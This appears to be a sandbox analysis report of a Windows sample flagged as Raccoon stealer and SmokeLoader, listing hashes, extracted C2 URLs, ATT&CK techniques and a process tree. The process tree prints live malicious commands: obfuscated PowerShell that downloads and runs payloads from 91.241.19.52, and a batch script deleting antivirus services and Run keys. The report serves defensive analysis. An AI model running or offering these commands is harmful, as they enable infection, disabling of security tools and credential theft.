raccoon | 940856f93e56ecd69b6833c94a78247b3f8d60348ac9b73928fd338113fbbc9e

Analysis

max time kernel
151s
max time network
136s
platform
windows10_x64
resource
win10v20210408
submitted
11-08-2021 06:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bfa14859432cc51e9f8a9b632dc38713.exe
Size

302KB
MD5

bfa14859432cc51e9f8a9b632dc38713
SHA1

b76262d0b04a555f9ddbef1e3f8a99fe8bf50f5f
SHA256

940856f93e56ecd69b6833c94a78247b3f8d60348ac9b73928fd338113fbbc9e
SHA512

92df1e4440a47ac40a7a32fcd064632b4ca414e85a8b607d53dee0c95980159db198aff55247a73df59914eb0db4828685d5d21a0659ead1674d252bc9ac01d9

Score

10^/10

raccoon smokeloader 83fbe81dd43f775dd8af3cd619f88f428fbd9a96 backdoor discovery evasion persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.52/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

raccoon

Botnet

83fbe81dd43f775dd8af3cd619f88f428fbd9a96

Attributes

url4cnc
https://telete.in/opa4kiprivatem

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/492-128-0x00000000048E0000-0x0000000004973000-memory.dmp	family_raccoon
behavioral2/memory/492-129-0x0000000000400000-0x0000000002CB4000-memory.dmp	family_raccoon

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

45 996 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

693A.exe6EF8.exeRuntimebroker.exe4J0sUZK11d.exesqlcmd.exe

pid process

1332 693A.exe
492 6EF8.exe
1548 Runtimebroker.exe
2644 4J0sUZK11d.exe
3632 sqlcmd.exe
Deletes itself 1 IoCs

Processes:

pid process

2180
Drops startup file 1 IoCs

Processes:

Runtimebroker.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe
Loads dropped DLL 5 IoCs

Processes:

6EF8.exe

pid process

492 6EF8.exe
492 6EF8.exe
492 6EF8.exe
492 6EF8.exe
492 6EF8.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

flow	pid	process
45	996	powershell.exe

pid	process
1332	693A.exe
492	6EF8.exe
1548	Runtimebroker.exe
2644	4J0sUZK11d.exe
3632	sqlcmd.exe

pid	process
2180

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk	Runtimebroker.exe

pid	process
492	6EF8.exe
492	6EF8.exe
492	6EF8.exe
492	6EF8.exe
492	6EF8.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.2'+'41'+'.19.5'+'2/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

bfa14859432cc51e9f8a9b632dc38713.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bfa14859432cc51e9f8a9b632dc38713.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bfa14859432cc51e9f8a9b632dc38713.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bfa14859432cc51e9f8a9b632dc38713.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2436 schtasks.exe
2216 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

580 timeout.exe

pid	process
2436	schtasks.exe
2216	schtasks.exe

pid	process
580	timeout.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

bfa14859432cc51e9f8a9b632dc38713.exe

pid	process
996	bfa14859432cc51e9f8a9b632dc38713.exe
996	bfa14859432cc51e9f8a9b632dc38713.exe
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2180
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

bfa14859432cc51e9f8a9b632dc38713.exe

pid process

996 bfa14859432cc51e9f8a9b632dc38713.exe

pid	process
2180

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3276	powershell.exe
Token: SeDebugPrivilege	996	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

2180

pid	process
2180

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

693A.exeRuntimebroker.exepowershell.exe6EF8.execmd.exe4J0sUZK11d.exesqlcmd.exe

description	pid	process	target process
PID 2180 wrote to memory of 1332	2180		693A.exe
PID 2180 wrote to memory of 1332	2180		693A.exe
PID 2180 wrote to memory of 1332	2180		693A.exe
PID 2180 wrote to memory of 492	2180		6EF8.exe
PID 2180 wrote to memory of 492	2180		6EF8.exe
PID 2180 wrote to memory of 492	2180		6EF8.exe
PID 1332 wrote to memory of 1548	1332	693A.exe	Runtimebroker.exe
PID 1332 wrote to memory of 1548	1332	693A.exe	Runtimebroker.exe
PID 1332 wrote to memory of 1548	1332	693A.exe	Runtimebroker.exe
PID 1548 wrote to memory of 3276	1548	Runtimebroker.exe	powershell.exe
PID 1548 wrote to memory of 3276	1548	Runtimebroker.exe	powershell.exe
PID 1548 wrote to memory of 3276	1548	Runtimebroker.exe	powershell.exe
PID 1548 wrote to memory of 996	1548	Runtimebroker.exe	powershell.exe
PID 1548 wrote to memory of 996	1548	Runtimebroker.exe	powershell.exe
PID 1548 wrote to memory of 996	1548	Runtimebroker.exe	powershell.exe
PID 996 wrote to memory of 2020	996	powershell.exe	powershell.exe
PID 996 wrote to memory of 2020	996	powershell.exe	powershell.exe
PID 996 wrote to memory of 2020	996	powershell.exe	powershell.exe
PID 996 wrote to memory of 2648	996	powershell.exe	cmd.exe
PID 996 wrote to memory of 2648	996	powershell.exe	cmd.exe
PID 996 wrote to memory of 2648	996	powershell.exe	cmd.exe
PID 492 wrote to memory of 2644	492	6EF8.exe	4J0sUZK11d.exe
PID 492 wrote to memory of 2644	492	6EF8.exe	4J0sUZK11d.exe
PID 492 wrote to memory of 2644	492	6EF8.exe	4J0sUZK11d.exe
PID 492 wrote to memory of 2304	492	6EF8.exe	cmd.exe
PID 492 wrote to memory of 2304	492	6EF8.exe	cmd.exe
PID 492 wrote to memory of 2304	492	6EF8.exe	cmd.exe
PID 2304 wrote to memory of 580	2304	cmd.exe	timeout.exe
PID 2304 wrote to memory of 580	2304	cmd.exe	timeout.exe
PID 2304 wrote to memory of 580	2304	cmd.exe	timeout.exe
PID 2644 wrote to memory of 2216	2644	4J0sUZK11d.exe	schtasks.exe
PID 2644 wrote to memory of 2216	2644	4J0sUZK11d.exe	schtasks.exe
PID 2644 wrote to memory of 2216	2644	4J0sUZK11d.exe	schtasks.exe
PID 3632 wrote to memory of 2436	3632	sqlcmd.exe	schtasks.exe
PID 3632 wrote to memory of 2436	3632	sqlcmd.exe	schtasks.exe
PID 3632 wrote to memory of 2436	3632	sqlcmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\bfa14859432cc51e9f8a9b632dc38713.exe
"C:\Users\Admin\AppData\Local\Temp\bfa14859432cc51e9f8a9b632dc38713.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:996

C:\Users\Admin\AppData\Local\Temp\693A.exe
C:\Users\Admin\AppData\Local\Temp\693A.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1332

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1548

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.2''+''41''+''.19.5''+''2/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:3276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:996

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )
4⤵
PID:2648

C:\Users\Admin\AppData\Local\Temp\6EF8.exe
C:\Users\Admin\AppData\Local\Temp\6EF8.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:492

C:\Users\Admin\AppData\Local\Temp\4J0sUZK11d.exe
"C:\Users\Admin\AppData\Local\Temp\4J0sUZK11d.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2644

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
3⤵
- Creates scheduled task(s)
PID:2216

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\6EF8.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2304

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
3⤵
- Delays execution with timeout.exe
PID:580

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3632

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
2⤵
- Creates scheduled task(s)
PID:2436

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

